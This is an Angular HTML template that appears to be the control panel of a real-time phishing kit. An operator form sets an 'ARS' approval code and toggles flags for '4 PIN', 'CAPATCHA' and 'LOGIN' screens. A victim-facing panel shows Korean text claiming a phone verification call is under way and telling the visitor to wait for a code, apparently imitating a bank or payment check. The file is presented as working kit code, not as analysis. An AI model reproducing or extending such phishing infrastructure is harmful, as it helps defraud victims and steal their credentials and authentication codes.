<div class="card">
    <span class="zein"><div class="card-body">
        <div class="container ">
            <form >    
                <div class="row col-4">
                    <div class="">SET ARS PAGE</div>
                    <br>
                    <input type="text" name="ars" placeholder="" [(ngModel)]="item.ars"  >
                    <br>
                    <div class="samir"> 
                        <input (click)="updateitem()" type="submit" value="ARS" class="btn btn-primary"> - 
                        <input (click)="updateitempin()" type="submit" value="4 PIN" class="btn btn-warning"> - 
                        <input (click)="updateitemcap()" type="submit" value="CAPATCHA" class="btn btn-success"> -
                        <input (click)="updateitemlog()" type="submit" value="LOGIN" class="btn btn-danger">
                    </div>
                </div><br>
            </form>
        </div>    

    </div></span> 
    <span class="zeind"><div class="">
        <div class="card-title">회원님께 ARS 인증을 위해 전화를 걸고 있습니다.<br>
            승인번호<br>
     
            <div *ngFor="let item of items" >

                <span *ngIf="item.pin != '';">
                    PIN IS ACTIVE
                </span>
                <span *ngIf="item.cap != '';">
                    CAPATCHA IS ACTIVE
                </span>

                <span *ngIf="item.log != '';">
                    LOGIN IS ACTIVE
                </span>

               <span *ngIf="item.ars != ''; else noitem" class="waei2"></span>
                <b>
                    {{item.ars}}
                </b>
                
            </div>
            <ng-template #noitem>
                <div class="fa-2x">
                <i class="fas fa-spinner fa-spin"></i>
               </div>
                코드가 생성 될 때까지 기다리십시오
            </ng-template>
        </div>

    </div></span> 
</div>